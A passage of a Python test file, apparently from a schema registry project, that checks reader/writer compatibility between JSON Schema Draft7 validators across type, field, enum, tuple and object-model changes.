MIN_PATTERN_STRICT_SCHEMA, MIN_PROPERTIES_INCREASED_SCHEMA, MIN_PROPERTIES_SCHEMA, MINIMUM_INCREASED_INTEGER_SCHEMA,
MINIMUM_INCREASED_NUMBER_SCHEMA, MINIMUM_INTEGER_SCHEMA, MINIMUM_NUMBER_SCHEMA, NON_OBJECT_SCHEMAS, NOT_ARRAY_SCHEMA,
NOT_BOOLEAN_SCHEMA, NOT_INT_SCHEMA, NOT_NUMBER_SCHEMA, NOT_OBJECT_SCHEMA, NOT_OF_EMPTY_SCHEMA, NOT_OF_TRUE_SCHEMA,
NOT_STRING_SCHEMA, NUMBER_SCHEMA, OBJECT_SCHEMA, OBJECT_SCHEMAS, ONEOF_ARRAY_A_DINT_B_NUM_SCHEMA,
ONEOF_ARRAY_B_NUM_C_DINT_OPEN_SCHEMA, ONEOF_ARRAY_B_NUM_C_INT_SCHEMA, ONEOF_INT_SCHEMA, ONEOF_NUMBER_SCHEMA,
ONEOF_STRING_INT_SCHEMA, ONEOF_STRING_SCHEMA, PATTERN_PROPERTY_ASTAR_OBJECT_SCHEMA, PROPERTY_NAMES_ASTAR_OBJECT_SCHEMA,
STRING_SCHEMA, TRUE_SCHEMA, TUPLE_OF_INT_INT_OPEN_SCHEMA, TUPLE_OF_INT_INT_SCHEMA, TUPLE_OF_INT_OPEN_SCHEMA,
TUPLE_OF_INT_SCHEMA, TUPLE_OF_INT_WITH_ADDITIONAL_INT_SCHEMA, TYPES_STRING_INT_SCHEMA, TYPES_STRING_SCHEMA
)
COMPATIBLE = SchemaCompatibilityResult.compatible()
COMPATIBILIY = "compatibility with schema registry"
COMPATIBLE_READER_IS_TRUE_SCHEMA = "The reader is a true schema which _accepts_ every value"
COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES = "The reader schema is an open schema and ignores unknown values"
COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED = "The new fields in the reader schema are not required"
COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET = "The reader schema changed a field type which accepts all writer values"
COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED = "Every value produced by the writer is accepted by the reader"
INCOMPATIBLE_READER_IS_FALSE_SCHEMA = "The reader is a false schema which _rejects_ every value"
INCOMPATIBLE_READER_IS_CLOSED_AND_REMOVED_FIELD = "The does not accepts all fields produced by the writer"
INCOMPATIBLE_READER_HAS_A_NEW_REQUIRED_FIELDg = "The reader has a new required field"
INCOMPATIBLE_READER_RESTRICTED_ACCEPTED_VALUES = (
"The reader changed restricted field and only accept a subset of the writer's values"
)
INCOMPATIBLE_READER_CHANGED_FIELD_TYPE = "The reader schema changed a field type, the previous values are no longer valid"
def schemas_are_compatible(
reader: Draft7Validator,
writer: Draft7Validator,
msg: str,
) -> None:
assert compatibility(reader=reader, writer=writer) == COMPATIBLE, msg
def not_schemas_are_compatible(
reader: Draft7Validator,
writer: Draft7Validator,
msg: str,
) -> None:
assert compatibility(reader=reader, writer=writer) != COMPATIBLE, msg
def test_reflexivity() -> None:
reflexivity_msg = "every schema is compatible with itself"
schemas_are_compatible(
reader=EVERY_TYPE_SCHEMA,
writer=EVERY_TYPE_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_OF_EMPTY_SCHEMA,
writer=NOT_OF_EMPTY_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_OF_TRUE_SCHEMA,
writer=NOT_OF_TRUE_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=FALSE_SCHEMA,
writer=FALSE_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=TRUE_SCHEMA,
writer=TRUE_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EMPTY_SCHEMA,
writer=EMPTY_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=BOOLEAN_SCHEMA,
writer=BOOLEAN_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=INT_SCHEMA,
writer=INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NUMBER_SCHEMA,
writer=NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=STRING_SCHEMA,
writer=STRING_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=OBJECT_SCHEMA,
writer=OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ARRAY_SCHEMA,
writer=ARRAY_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_BOOLEAN_SCHEMA,
writer=NOT_BOOLEAN_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_INT_SCHEMA,
writer=NOT_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_NUMBER_SCHEMA,
writer=NOT_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_STRING_SCHEMA,
writer=NOT_STRING_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_OBJECT_SCHEMA,
writer=NOT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=NOT_ARRAY_SCHEMA,
writer=NOT_ARRAY_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAX_LENGTH_SCHEMA,
writer=MAX_LENGTH_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAX_LENGTH_DECREASED_SCHEMA,
writer=MAX_LENGTH_DECREASED_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_LENGTH_SCHEMA,
writer=MIN_LENGTH_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_LENGTH_INCREASED_SCHEMA,
writer=MIN_LENGTH_INCREASED_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_PATTERN_SCHEMA,
writer=MIN_PATTERN_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_PATTERN_STRICT_SCHEMA,
writer=MIN_PATTERN_STRICT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAXIMUM_INTEGER_SCHEMA,
writer=MAXIMUM_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAXIMUM_NUMBER_SCHEMA,
writer=MAXIMUM_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAXIMUM_DECREASED_INTEGER_SCHEMA,
writer=MAXIMUM_DECREASED_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAXIMUM_DECREASED_NUMBER_SCHEMA,
writer=MAXIMUM_DECREASED_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MINIMUM_INTEGER_SCHEMA,
writer=MINIMUM_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MINIMUM_NUMBER_SCHEMA,
writer=MINIMUM_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MINIMUM_INCREASED_INTEGER_SCHEMA,
writer=MINIMUM_INCREASED_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MINIMUM_INCREASED_NUMBER_SCHEMA,
writer=MINIMUM_INCREASED_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MAXIMUM_INTEGER_SCHEMA,
writer=EXCLUSIVE_MAXIMUM_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
writer=EXCLUSIVE_MAXIMUM_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MAXIMUM_DECREASED_INTEGER_SCHEMA,
writer=EXCLUSIVE_MAXIMUM_DECREASED_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MAXIMUM_DECREASED_NUMBER_SCHEMA,
writer=EXCLUSIVE_MAXIMUM_DECREASED_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MINIMUM_INTEGER_SCHEMA,
writer=EXCLUSIVE_MINIMUM_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
writer=EXCLUSIVE_MINIMUM_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MINIMUM_INCREASED_INTEGER_SCHEMA,
writer=EXCLUSIVE_MINIMUM_INCREASED_INTEGER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EXCLUSIVE_MINIMUM_INCREASED_NUMBER_SCHEMA,
writer=EXCLUSIVE_MINIMUM_INCREASED_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAX_PROPERTIES_SCHEMA,
writer=MAX_PROPERTIES_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAX_PROPERTIES_DECREASED_SCHEMA,
writer=MAX_PROPERTIES_DECREASED_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_PROPERTIES_SCHEMA,
writer=MIN_PROPERTIES_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_PROPERTIES_INCREASED_SCHEMA,
writer=MIN_PROPERTIES_INCREASED_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAX_ITEMS_SCHEMA,
writer=MAX_ITEMS_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MAX_ITEMS_DECREASED_SCHEMA,
writer=MAX_ITEMS_DECREASED_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_ITEMS_SCHEMA,
writer=MIN_ITEMS_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=MIN_ITEMS_INCREASED_SCHEMA,
writer=MIN_ITEMS_INCREASED_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_INT_SCHEMA,
writer=TUPLE_OF_INT_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_SCHEMA,
writer=TUPLE_OF_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_WITH_ADDITIONAL_INT_SCHEMA,
writer=TUPLE_OF_INT_WITH_ADDITIONAL_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_INT_SCHEMA,
writer=TUPLE_OF_INT_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_OPEN_SCHEMA,
writer=TUPLE_OF_INT_OPEN_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ARRAY_OF_INT_SCHEMA,
writer=ARRAY_OF_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ARRAY_OF_NUMBER_SCHEMA,
writer=ARRAY_OF_NUMBER_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ARRAY_OF_STRING_SCHEMA,
writer=ARRAY_OF_STRING_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ENUM_AB_SCHEMA,
writer=ENUM_AB_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ENUM_ABC_SCHEMA,
writer=ENUM_ABC_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ENUM_BC_SCHEMA,
writer=ENUM_BC_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ONEOF_STRING_SCHEMA,
writer=ONEOF_STRING_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ONEOF_STRING_INT_SCHEMA,
writer=ONEOF_STRING_INT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=EMPTY_OBJECT_SCHEMA,
writer=EMPTY_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_INT_OPEN_OBJECT_SCHEMA,
writer=A_INT_OPEN_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_INT_B_INT_OBJECT_SCHEMA,
writer=A_INT_B_INT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_INT_B_INT_REQUIRED_OBJECT_SCHEMA,
writer=A_INT_B_INT_REQUIRED_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_INT_B_DINT_OBJECT_SCHEMA,
writer=A_INT_B_DINT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_INT_B_DINT_REQUIRED_OBJECT_SCHEMA,
writer=A_INT_B_DINT_REQUIRED_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_DINT_B_DINT_OBJECT_SCHEMA,
writer=A_DINT_B_DINT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_DINT_B_NUM_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=A_DINT_B_NUM_C_DINT_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_C_DINT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
writer=B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=B_NUM_C_INT_OBJECT_SCHEMA,
writer=B_NUM_C_INT_OBJECT_SCHEMA,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ARRAY_OF_POSITIVE_INTEGER,
writer=ARRAY_OF_POSITIVE_INTEGER,
msg=reflexivity_msg,
)
schemas_are_compatible(
reader=ARRAY_OF_POSITIVE_INTEGER_THROUGH_REF,
writer=ARRAY_OF_POSITIVE_INTEGER_THROUGH_REF,
msg=reflexivity_msg,
)
def test_extra_optional_field_with_open_model_is_compatible() -> None:
# - the reader is an open model, the extra field produced by the writer is
# automatically accepted
schemas_are_compatible(
reader=OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
schemas_are_compatible(
reader=TRUE_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
schemas_are_compatible(
reader=EMPTY_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
# - the writer is a closed model, so the field `b` was never produced, which
# means that the writer never produced an invalid value.
# - the reader's `b` field is optional, so the absenced of the field is not
# a problem, and `a` is ignored because of the open model
schemas_are_compatible(
reader=B_INT_OPEN_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
# - if the model is closed, then `a` must also be accepted
schemas_are_compatible(
reader=A_INT_B_INT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED,
)
# Examples a bit more complex
schemas_are_compatible(
reader=A_DINT_B_NUM_C_DINT_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED,
)
schemas_are_compatible(
reader=B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_C_DINT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
schemas_are_compatible(
reader=B_NUM_C_INT_OPEN_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_OBJECT_SCHEMA,
msg=f"{COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES} + {COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED}",
)
schemas_are_compatible(
reader=B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_OBJECT_SCHEMA,
msg=f"{COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES} + {COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED}",
)
def test_extra_field_with_closed_model_is_incompatible() -> None:
# The false schema always falways validation, so the values produced by the
# writer won't be valid.
# https://json-schema.org/draft/2020-12/json-schema-core.html#rfc.section.4.3.2
#
# not_schemas_are_compatible(
# reader=FALSE_SCHEMA,
# writer=A_INT_OBJECT_SCHEMA,
# msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
# )
not_schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=FALSE_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
not_schemas_are_compatible(
reader=NOT_OF_TRUE_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
not_schemas_are_compatible(
reader=NOT_OF_EMPTY_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
not_schemas_are_compatible(
reader=B_INT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_IS_CLOSED_AND_REMOVED_FIELD,
)
not_schemas_are_compatible(
reader=B_NUM_C_INT_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_IS_CLOSED_AND_REMOVED_FIELD,
)
not_schemas_are_compatible(
reader=B_NUM_C_INT_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_C_DINT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_IS_CLOSED_AND_REMOVED_FIELD,
)
def test_missing_required_field_is_incompatible() -> None:
not_schemas_are_compatible(
reader=A_INT_B_INT_REQUIRED_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_HAS_A_NEW_REQUIRED_FIELDg,
)
# The writer is not producing the value `b`, which is required by the
# reader
# not_schemas_are_compatible(
# reader=A_INT_B_DINT_REQUIRED_OBJECT_SCHEMA,
# writer=A_INT_OBJECT_SCHEMA,
# msg=INCOMPATIBLE_READER_HAS_A_NEW_REQUIRED_FIELDg,
# )
not_schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=A_INT_B_DINT_REQUIRED_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_HAS_A_NEW_REQUIRED_FIELDg,
)
def test_giving_a_default_value_for_a_non_required_field_is_compatible() -> None:
schemas_are_compatible(
reader=OBJECT_SCHEMA,
writer=A_DINT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
schemas_are_compatible(
reader=TRUE_SCHEMA,
writer=A_DINT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
schemas_are_compatible(
reader=EMPTY_SCHEMA,
writer=A_DINT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
schemas_are_compatible(
reader=B_DINT_OPEN_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_TRUE_SCHEMA,
)
schemas_are_compatible(
reader=A_INT_B_DINT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED,
)
schemas_are_compatible(
reader=A_DINT_B_INT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED,
)
schemas_are_compatible(
reader=B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
writer=A_DINT_B_NUM_OBJECT_SCHEMA,
msg=f"{COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES} + {COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED}",
)
schemas_are_compatible(
reader=A_DINT_B_DINT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE, # field B was anything, now it int
)
schemas_are_compatible(
reader=A_DINT_B_DINT_OBJECT_SCHEMA,
writer=EMPTY_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_NEW_FIELD_IS_NOT_REQUIRED,
)
def test_boolean_schemas_are_backward_compatible() -> None:
# reader is the false schema, which never accepts a value
# https://json-schema.org/draft/2020-12/json-schema-core.html#rfc.section.4.3.2
# not_schemas_are_compatible(
# reader=FALSE_SCHEMA,
# writer=TRUE_SCHEMA,
# msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
# )
schemas_are_compatible(
reader=FALSE_SCHEMA,
writer=TRUE_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
schemas_are_compatible(
reader=TRUE_SCHEMA,
writer=FALSE_SCHEMA,
msg=INCOMPATIBLE_READER_IS_FALSE_SCHEMA,
)
def test_from_closed_to_open_is_incompatible() -> None:
not_schemas_are_compatible(
reader=B_NUM_C_INT_OBJECT_SCHEMA,
writer=B_NUM_C_DINT_OPEN_OBJECT_SCHEMA,
msg="The reader is closed model and rejects the fields ignored by the writer",
)
def test_union_with_incompatible_elements() -> None:
not_schemas_are_compatible(
reader=ONEOF_ARRAY_B_NUM_C_INT_SCHEMA,
writer=ONEOF_ARRAY_A_DINT_B_NUM_SCHEMA,
msg=INCOMPATIBLE_READER_IS_CLOSED_AND_REMOVED_FIELD,
)
def test_union_with_compatible_elements() -> None:
schemas_are_compatible(
reader=ONEOF_ARRAY_B_NUM_C_DINT_OPEN_SCHEMA,
writer=ONEOF_ARRAY_A_DINT_B_NUM_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
def test_array_and_tuples_are_incompatible() -> None:
# both tuple and arrays are represented using lists, this should be
# compatible
# schemas_are_compatible(
# reader=ARRAY_OF_INT_SCHEMA,
# writer=TUPLE_OF_INT_OPEN_SCHEMA,
# msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
# )
# schemas_are_compatible(
# reader=ARRAY_OF_INT_SCHEMA,
# writer=TUPLE_OF_INT_INT_SCHEMA,
# msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
# )
not_schemas_are_compatible(
reader=TUPLE_OF_INT_OPEN_SCHEMA,
writer=ARRAY_OF_INT_SCHEMA,
msg=COMPATIBILIY,
)
not_schemas_are_compatible(
reader=ARRAY_OF_INT_SCHEMA,
writer=TUPLE_OF_INT_OPEN_SCHEMA,
msg=COMPATIBILIY,
)
def test_true_schema_is_compatible_with_object() -> None:
for schema in OBJECT_SCHEMAS + BOOLEAN_SCHEMAS:
if schema != TRUE_SCHEMA:
schemas_are_compatible(
reader=TRUE_SCHEMA,
writer=schema,
msg=COMPATIBILIY,
)
for schema in NON_OBJECT_SCHEMAS:
not_schemas_are_compatible(
reader=TRUE_SCHEMA,
writer=schema,
msg=COMPATIBILIY,
)
def test_schema_compatibility_successes() -> None:
# allowing a broader set of values is compatible
schemas_are_compatible(
reader=NUMBER_SCHEMA,
writer=INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=ARRAY_OF_NUMBER_SCHEMA,
writer=ARRAY_OF_INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_OPEN_SCHEMA,
writer=TUPLE_OF_INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_WITH_ADDITIONAL_INT_SCHEMA,
writer=TUPLE_OF_INT_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=ENUM_ABC_SCHEMA,
writer=ENUM_AB_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=ONEOF_STRING_INT_SCHEMA,
writer=ONEOF_STRING_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=ONEOF_STRING_INT_SCHEMA,
writer=STRING_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=A_INT_OPEN_OBJECT_SCHEMA,
writer=A_INT_B_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
# requiring less values is compatible
schemas_are_compatible(
reader=TUPLE_OF_INT_OPEN_SCHEMA,
writer=TUPLE_OF_INT_INT_OPEN_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
schemas_are_compatible(
reader=TUPLE_OF_INT_OPEN_SCHEMA,
writer=TUPLE_OF_INT_INT_SCHEMA,
msg=COMPATIBLE_READER_IS_OPEN_AND_IGNORE_UNKNOWN_VALUES,
)
# equivalences
schemas_are_compatible(
reader=ONEOF_STRING_SCHEMA,
writer=STRING_SCHEMA,
msg=COMPATIBLE_READER_FIELD_TYPE_IS_A_SUPERSET,
)
schemas_are_compatible(
reader=STRING_SCHEMA,
writer=ONEOF_STRING_SCHEMA,
msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
)
# new non-required fields is compatible
schemas_are_compatible(
reader=A_INT_OBJECT_SCHEMA,
writer=EMPTY_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
)
schemas_are_compatible(
reader=A_INT_B_INT_OBJECT_SCHEMA,
writer=A_INT_OBJECT_SCHEMA,
msg=COMPATIBLE_READER_EVERY_VALUE_IS_ACCEPTED,
)
def test_type_narrowing_incompabilities() -> None:
not_schemas_are_compatible(
reader=INT_SCHEMA,
writer=NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ARRAY_OF_INT_SCHEMA,
writer=ARRAY_OF_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ENUM_AB_SCHEMA,
writer=ENUM_ABC_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ENUM_BC_SCHEMA,
writer=ENUM_ABC_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ONEOF_INT_SCHEMA,
writer=ONEOF_NUMBER_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ONEOF_STRING_SCHEMA,
writer=ONEOF_STRING_INT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=INT_SCHEMA,
writer=ONEOF_STRING_INT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
def test_type_mismatch_incompabilities() -> None:
not_schemas_are_compatible(
reader=BOOLEAN_SCHEMA,
writer=INT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=INT_SCHEMA,
writer=BOOLEAN_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=STRING_SCHEMA,
writer=BOOLEAN_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=STRING_SCHEMA,
writer=INT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ARRAY_OF_INT_SCHEMA,
writer=ARRAY_OF_STRING_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=TUPLE_OF_INT_INT_SCHEMA,
writer=TUPLE_OF_INT_OPEN_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=TUPLE_OF_INT_INT_OPEN_SCHEMA,
writer=TUPLE_OF_INT_OPEN_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=INT_SCHEMA,
writer=ENUM_AB_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
not_schemas_are_compatible(
reader=ENUM_AB_SCHEMA,
writer=INT_SCHEMA,
msg=INCOMPATIBLE_READER_CHANGED_FIELD_TYPE,
)
